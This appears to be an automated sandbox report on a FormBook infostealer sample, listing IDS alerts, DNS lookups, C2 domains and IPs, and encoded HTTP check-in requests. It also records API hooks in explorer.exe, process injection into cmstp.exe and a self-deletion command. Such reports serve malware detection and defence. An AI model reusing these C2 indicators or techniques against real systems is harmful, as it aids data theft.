                                                    FileVersion5.77.0.0
                                                    CompanyNameIdentityObject LTD
                                                    LegalTrademarks
                                                    CommentsBitConverter
                                                    ProductNameBitConverter
                                                    ProductVersion5.77.0.0
                                                    FileDescriptionBitConverter
                                                    OriginalFilenamePackingSize.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/13/21-21:28:09.654078TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.7
                                                    01/13/21-21:28:30.659590TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:28:30.659590TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:28:30.659590TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:29:11.660530TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.7

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:28:09.474320889 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.514507055 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.514614105 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.514786005 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.554968119 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654078007 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654102087 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654325008 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.654438019 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.694464922 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:30.491645098 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.659271002 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:30.659426928 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.659590006 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.827095985 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.162807941 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.261763096 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.261784077 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.261873007 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.261960030 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.330554008 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.330646992 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:51.561528921 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:28:51.751950026 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:28:51.753366947 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:28:54.564081907 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.565367937 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.767661095 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:00.768584013 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.768748045 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:01.283525944 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:01.818743944 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:01.819772005 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:03.768001080 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:03.818861961 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:03.820911884 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:04.004724979 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:06.017481089 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:06.017591000 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:11.480622053 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.520770073 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.520915031 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.521064043 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.561067104 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660530090 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660566092 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660778046 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:12.459778070 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:12.499941111 CET804975934.102.136.180192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:26:13.953279018 CET53645698.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:14.781059027 CET5281653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:14.829000950 CET53528168.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:15.835195065 CET5078153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:15.886240959 CET53507818.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:16.856674910 CET5423053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:16.904561043 CET53542308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:18.084306002 CET5491153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:18.135071039 CET53549118.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:18.876074076 CET4995853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:18.923924923 CET53499588.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:19.670840979 CET5086053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:19.718683958 CET53508608.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:20.868812084 CET5045253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:20.921554089 CET53504528.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:23.229006052 CET5973053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:23.279880047 CET53597308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:25.162133932 CET5931053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:25.210072041 CET53593108.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:26.380721092 CET5191953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:26.431509972 CET53519198.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:27.509810925 CET6429653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:27.560648918 CET53642968.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:33.432677984 CET5668053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:33.490365028 CET53566808.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:44.839874983 CET5882053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:44.890532017 CET53588208.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:51.334427118 CET6098353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:51.391041040 CET53609838.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:04.145936966 CET4924753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:04.210891962 CET53492478.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:10.961987972 CET5228653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:11.019543886 CET53522868.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:15.879688025 CET5606453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:15.939393997 CET53560648.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:16.699513912 CET6374453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:16.747385979 CET53637448.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:17.357705116 CET6145753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:17.416974068 CET53614578.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:17.889926910 CET5836753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:17.953469992 CET53583678.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:18.834697008 CET6059953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:18.882541895 CET53605998.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:18.997663021 CET5957153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:19.054007053 CET53595718.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:19.627545118 CET5268953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:19.675343990 CET53526898.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:20.443139076 CET5029053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:20.500231981 CET53502908.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:21.676707029 CET6042753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:21.724482059 CET53604278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:22.729760885 CET5620953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:22.788852930 CET53562098.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:23.225528955 CET5958253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:23.282030106 CET53595828.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:26.635231018 CET6094953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:26.933274031 CET53609498.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:42.913903952 CET5854253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:42.973519087 CET53585428.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:47.137257099 CET5917953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:47.199104071 CET53591798.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:47.372279882 CET6092753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:47.424484968 CET53609278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:05.201100111 CET5785453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:05.251754999 CET53578548.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:09.402024031 CET6202653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:09.469573975 CET53620268.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:30.421834946 CET5945353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:30.490278959 CET53594538.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:51.499365091 CET6246853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:51.560517073 CET53624688.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:29:11.418458939 CET5256353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:29:11.479146957 CET53525638.8.8.8192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 13, 2021 21:27:26.635231018 CET192.168.2.78.8.8.80x2cc4Standard query (0)www.semaindustrial.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:27:47.137257099 CET192.168.2.78.8.8.80x2af9Standard query (0)www.trinewstyles.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.402024031 CET192.168.2.78.8.8.80x44cStandard query (0)www.miproper.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:30.421834946 CET192.168.2.78.8.8.80x750cStandard query (0)www.fordexplorerproblems.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.499365091 CET192.168.2.78.8.8.80x5754Standard query (0)www.southsideflooringcreations.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.418458939 CET192.168.2.78.8.8.80xd13aStandard query (0)www.exoticorganicwine.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 13, 2021 21:27:26.933274031 CET8.8.8.8192.168.2.70x2cc4Server failure (2)www.semaindustrial.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:27:47.199104071 CET8.8.8.8192.168.2.70x2af9Name error (3)www.trinewstyles.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.469573975 CET8.8.8.8192.168.2.70x44cNo error (0)www.miproper.commiproper.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.469573975 CET8.8.8.8192.168.2.70x44cNo error (0)miproper.com34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:30.490278959 CET8.8.8.8192.168.2.70x750cNo error (0)www.fordexplorerproblems.com74.208.236.28A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.560517073 CET8.8.8.8192.168.2.70x5754No error (0)www.southsideflooringcreations.comsouthsideflooringcreations.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.560517073 CET8.8.8.8192.168.2.70x5754No error (0)southsideflooringcreations.com184.168.131.241A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.479146957 CET8.8.8.8192.168.2.70xd13aNo error (0)www.exoticorganicwine.comexoticorganicwine.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.479146957 CET8.8.8.8192.168.2.70xd13aNo error (0)exoticorganicwine.com34.102.136.180A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.miproper.com
                                                    • www.fordexplorerproblems.com
                                                    • www.southsideflooringcreations.com
                                                    • www.exoticorganicwine.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.74975634.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:28:09.514786005 CET4960OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1
                                                    Host: www.miproper.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:28:09.654078007 CET4960INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:28:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5ffc83a2-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.74975774.208.236.2880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:28:30.659590006 CET4962OUTGET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1
                                                    Host: www.fordexplorerproblems.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:28:31.261763096 CET4962INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 13 Jan 2021 20:28:30 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/7.4.14
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: https://www.fordexplorerproblems.com/dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.749758184.168.131.24180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:29:00.768748045 CET4963OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1
                                                    Host: www.southsideflooringcreations.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:29:03.768001080 CET4964OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1
                                                    Host: www.southsideflooringcreations.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.74975934.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:29:11.521064043 CET4965OUTGET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1
                                                    Host: www.exoticorganicwine.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:29:11.660530090 CET4966INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:29:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5ffc838f-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:21:26:18
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\20210113432.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\20210113432.exe'
                                                    Imagebase:0x920000
                                                    File size:1070592 bytes
                                                    MD5 hash:13DBC9C1C5A2811ECBEE5F420C9C75B6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:21:26:26
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\20210113432.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\20210113432.exe
                                                    Imagebase:0x940000
                                                    File size:1070592 bytes
                                                    MD5 hash:13DBC9C1C5A2811ECBEE5F420C9C75B6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:21:26:29
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff662bf0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:21:26:41
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                    Imagebase:0xde0000
                                                    File size:82944 bytes
                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:21:26:46
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\20210113432.exe'
                                                    Imagebase:0x12c0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:21:26:46
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff774ee0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >